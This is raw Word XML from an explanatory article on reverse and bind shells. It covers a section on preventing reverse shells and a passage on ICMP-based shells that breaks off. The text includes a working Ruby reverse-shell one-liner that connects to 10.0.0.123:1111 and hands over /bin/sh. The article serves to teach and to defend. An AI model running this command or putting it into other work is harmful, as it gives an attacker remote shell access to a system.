        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="600" w:after="375" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Ruby Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EFF1EE" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Ruby is another popular web application language that’s likely to have an interpreter on a general-purpose server system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521283B" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195A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40" w:lineRule="auto"/>
        <w:ind w:left="300" w:right="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ruby -rsocket -e'f=TCPSocket.open("10.0.0.123",1111).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64112125" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="750" w:after="450" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="45"/>
          <w:szCs w:val="45"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Preventing Reverse Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00316DC0" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Unless you are deliberately using reverse shells for remote administration, any reverse shell connections are likely to be malicious. Unfortunately, there’s also no surefire way of blocking reverse shell connections on a networked system, especially a server. You can mitigate the risk by selectively hardening your system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C020C" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>To limit exploitation, you can lock down outgoing connectivity to allow only specific remote IP addresses and ports for the required services. This might be achieved by sandboxing or running the server in a minimal container. Another way could be to set up a proxy server with tightly controlled destination restrictions. However, considering that reverse shells can be created even over DNS, such hardening can only limit the risk of reverse shell connections, not eliminate it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F728AE" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="180" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>To make attacks a little more difficult, you can remove all unnecessary tools and interpreters to prevent the execution of at least some reverse shell codes. However, this is usually not a practical option except for the most hardened and specialized servers, and a determined attacker will eventually find a working shell script anyway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E06467" w14:textId="77777777" w:rsidR="00195AE6" w:rsidRPr="00195AE6" w:rsidRDefault="00195AE6" w:rsidP="00195AE6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Regardless of the technicalities, once an attacker has a way of executing OS commands, the system should be considered compromised – so the best protection from reverse shells is to prevent exploitation in the first place. Shell scripts are typically executed by exploiting a </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>code injection vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, often followed by </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>privilege escalation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> to obtain root privileges. To avoid </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>these and other vulnerabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, it’s vital to regularly patch your servers and web applications, and test them using a </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00195AE6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="3E3E3E"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>proven vulnerability scanner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00195AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3E3E3E"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC491E4" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Types of shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261D90DA" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574AB770" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C1F06" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EF1322"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A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBDACAE" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AEF5B49" wp14:editId="6B8DCECB">
            <wp:extent cx="5048250" cy="143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0" cy="1435100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43968B4B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 1: Reverse TCP shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016A8E4C" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE1A91C"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Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F219D85" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A432254" wp14:editId="3C88CF9A">
            <wp:extent cx="518160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1447800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A4D08F" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2: Bind TCP shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1BE3D"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There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc. One thing which is common between all these shells is that they all communicate over a TCP protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674BFE27"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Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69620FC2" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67910DAD" wp14:editId="42C691AB">
            <wp:extent cx="59436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72036D66" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Figure 3: Firewall blocks bind &amp; reverse connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0888DFCA"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But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FDF412"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ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A89060A" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:spacing w:after="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When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>ECHO REQUEST </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>and waits for an </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="474747"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
